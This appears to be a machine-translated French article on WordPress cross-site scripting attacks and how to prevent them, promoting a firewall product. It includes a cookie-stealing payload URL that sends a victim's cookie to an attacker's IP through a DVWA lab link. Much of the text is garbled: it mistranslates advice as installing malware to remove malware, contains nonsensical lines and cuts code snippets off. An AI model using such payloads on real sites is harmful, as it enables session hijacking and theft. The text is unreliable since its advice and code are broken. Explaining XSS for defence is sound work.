Attaques WordPress xss: comment les prévenir
Commençons par dire que si vous êtes inquiet pour WordPress xss, vous n’êtes pas paranoïaque, mais prudent. Les vulnérabilités de script inter – site ne se limitent pas aux sites WordPress, mais elles ont un impact égal sur eux. La meilleure défense est d’installer un pare – feu et de garder les sujets et les plug – ins à jour. Dans cet article, nous allons analyser exactement ce qu’est une vulnérabilité, soyez patient, et il deviendra technique afin que vous puissiez prendre des décisions éclairées sur la sécurité du site. Nous avons un guide complet sur la façon de prévenir les attaques que vous pouvez également consulter.
TL; Dr: Si vous soupçonnez que votre site WordPress a été piraté, nous vous recommandons d’installer des logiciels malveillants pour supprimer immédiatement les logiciels malveillants de votre site. Qu’est – ce que WordPress xss? Pourquoi les attaques xss sont – elles si courantes? Mon site Web est – il vulnérable aux attaques xss? Toutes les attaques xss sont – elles également dangereuses? Comment les hackers peuvent – ils exploiter ces vulnérabilités? Comment vous protéger des attaques xss? Comment détecter les attaques WordPress xss sur le site comment fonctionne xss? Quelles sont les prochaines étapes pour les types de script entre les sites? FAQ qu’est – ce que WordPress xss? WordPress xss est une attaque de logiciels malveillants qui exploite une vulnérabilité de script inter – site sur le site WordPress. C’est la manière la plus courante pour les sites WordPress d’être piratés, d’autant plus qu’il existe un grand nombre de plug – ins présentant des vulnérabilités xss.
Alors, quel est le script entre les sites? Un script inter – site ou xss est une vulnérabilité qui permet au code JavaScript non autorisé de fonctionner sur un site Web. En fait, il s’agit de la vulnérabilité la plus courante du site Web et est extrêmement difficile à détecter, car il peut y avoir plusieurs types d’attaques qui exploitent cette vulnérabilité. Cela est particulièrement vrai pour les grands sites Web complexes. Il existe de nombreux types d’attaques, mais pour plus de clarté, elles peuvent être classées en deux catégories: les scripts malveillants
Il n’y a qu’un seul moyen pour les victimes de voler des informations financières pour se protéger contre de telles attaques. Installez le pare – feu malcare maintenant. Toutes les attaques xss sont – elles également dangereuses? Non. Certaines attaques xss sont plus dangereuses parce qu’elles permettent aux hackers d’accéder complètement à votre site. Ensuite, les hackers peuvent faire tout ce qu’ils veulent sur le site.
D’autres permettent aux hackers d’éditer une petite partie du site. Il peut également être très dangereux que les logiciels malveillants soient fournis à vos visiteurs et plus encore. Certaines attaques xss peuvent exiger que le hacker soit déjà un contributeur à votre site. Dans ce cas, le risque représenté est beaucoup plus faible. Comment les hackers peuvent – ils exploiter ces vulnérabilités? La plupart des hackers utilisent l’automatisation pour découvrir les vulnérabilités. Après ça, c’est juste un problème de hacker. Dans certains cas, toute l’attaque peut être exécutée par un robot.
Nous vous avons dit à l’avance que les hackers peuvent réellement utiliser des scripts inter – sites de cinq façons de base. Nous vous guiderons dans tous ces changements un par un 1 redirection de session utilisateur nous avons discuté de la façon dont les attaques xss accèdent aux cookies. La partie la plus dangereuse de la récupération des cookies est que le même hacker peut révéler l’id de session de l’utilisateur. La plupart des sites Web utilisent une session comme identificateur unique pour chaque utilisateur. Ces sessions sont stockées dans des cookies de session. Utilisez le script simple suivant:
http:\/\/localhost:81\/DVWA\/vulnerabilities\/xss_r\/?name= Nouvelle image (). Src = ‘ http:\/\/192.168.149.128\/bogus.php?output= \
Tout compte auquel vous pouvez vous connecter sans mot de passe 2 effectuer des activités non autorisées parfois, les pirates informatiques ne peuvent pas voler des cookies en utilisant JavaScript. Dans ce cas, ils ont tenté d’utiliser une attaque xss pour effectuer des tâches non autorisées. Par exemple, un message qui apparaît dans votre commentaire de billet de blog et qui continuera à être publié.
Ce type d’attaque peut prendre la forme d’un site Web corrompu ou de scripts malveillants et continue de se propager à un nombre croissant d’utilisateurs # 3 attaques d’hameçonnage dans de nombreux cas, les attaques WordPress xss ne sont que le point de départ d’un scénario plus vaste. Il existe des scripts entre les sites qui peuvent également causer des attaques d’hameçonnage sur votre site. Dans la plupart des cas, des scripts malveillants commencent à pousser la fraude à l’hameçonnage sur votre site, ce qui fait que vos utilisateurs abandonnent leurs informations sensibles. Nous avons un article complet sur les attaques d’hameçonnage, si vous voulez en savoir plus, s’il vous plaît lire.
4 installation d’enregistreurs de clavier dans ce scénario d’attaque, un hacker implémente un script pour installer un enregistreur de clavier sur un site vulnérable. Chaque fois qu’un utilisateur tape quelque chose, le Keylogger le stocke et l’envoie au hacker. C’est une attaque dangereuse qui peut voler des mots de passe et des informations de carte de crédit instantanément. Le fichier javascript contient le code suivant: Source de l’image: pentesttools dans ce code, vous verrez que JavaScript ouvre un fichier appelé \
Izzo IP est interdit sur tous les sites Web protégés par des logiciels malveillants.
Tentative de récupérer le cookie et d’afficher la fenêtre de confirmation dans le navigateur.
Votre site Web est un blog qui permet aux gens de commenter les articles que vous postez. Lorsque les visiteurs laissent des commentaires, les données sont envoyées à la base de données et stockées. Votre site devrait être configuré pour désinfecter les données avant de les envoyer à la base de données. Cela signifie qu’il devrait vérifier si l’utilisateur a entré un commentaire normal ou un script malveillant. Si ces contrôles ne sont pas en place, une vulnérabilité WordPress xss sera ouverte. Voyons comment: Étape 1: un hacker découvre une vulnérabilité et l’exploite pour naviguer sur Internet à l’aide d’un scanner automatique et trouver un site Web avec une vulnérabilité xss. Une fois qu’ils ont trouvé votre site, ils ont placé des scripts malveillants dans la section commentaires. Comme votre site n’a pas de contrôle, acceptez le script et envoyez – le à la base de données. Étape 2: le visiteur affiche la page infectée pour le visiteur, et l’entrée du hacker ressemble à un commentaire normal. Ce que les visiteurs et les propriétaires du site ne savent pas, c’est que ce commentaire est un code exécutable conçu pour voler des cookies. Toute personne qui accède directement à cette page sera touchée. Étape 3: les pirates informatiques volent les cookies de navigateur nous savons que les utilisateurs ordinaires ouvrent souvent plusieurs étiquettes sur les sites de magasinage comme email, Facebook, Amazon, les sites de travail, YouTube et d’autres navigateurs. Le Code s’exécute lorsqu’ils visitent votre site Web et voient des pages contenant des commentaires de hackers. Cela permet aux pirates de voler des cookies de navigateur. Cette attaque est connue sous le nom de « Cross – site » parce qu’ils peuvent voler des cookies de tous les sites ouverts sur différents onglets. Étape 4: le hacker attaque ensuite à l’aide de cookies volés qui lui permettent de se faire passer pour un utilisateur authentifié sur le site d’achat et de faire des achats. Un attaquant peut voler des informations sensibles sur le compte, telles que le nom d’utilisateur et le mot de passe. Ils peuvent aussi.
Il a piraté votre e – mail et envoyé des messages d’hameçonnage ou de fraude à vos contacts. Cette liste est sans fin. Ce type d’attaque met en danger quiconque accède à votre site. Dans la prochaine attaque xss, elle est dirigée directement contre le site Web. Attaques XSS réfléchissantes ou non persistantes lors d’attaques précédentes, nous avons vu comment les hackers ciblaient les visiteurs. Mais dans cette attaque, le hacker infectera le site lui – même. Comme indiqué ci – dessus, la plupart des utilisateurs d’Internet ont plusieurs onglets ouverts sur leur navigateur. Il en va de même pour les propriétaires de sites Web. Le plus souvent, WordPress Management user Panel n’est qu’un des onglets ouverts sur le navigateur. Cela permet une attaque xss réfléchie. Nous expliquerons comment cela se passe: Étape 1: convaincre les propriétaires de sites Web de cliquer souvent sur des liens malveillants, les hackers envoient des liens malveillants par e – mail, espérant que quelqu’un tombe amoureux de leurs tours. Dans d’autres cas, le hacker place ces liens malveillants sur d’autres sites WordPress. Lorsque vous cliquez sur le lien, le script est téléchargé sur votre site à partir d’un site externe. Ce lien contient le code suivant: https:\/\/yoursite.com\/test.php?val=
Le modèle générique de xss est difficile à détecter. Comment protéger votre site des attaques xss? La façon la plus simple de se défendre contre les attaques xss est d’installer un pare – feu qui bloque efficacement le trafic malveillant. Pour WordPress, nous vous recommandons également de renforcer votre site en cas de piratage classique.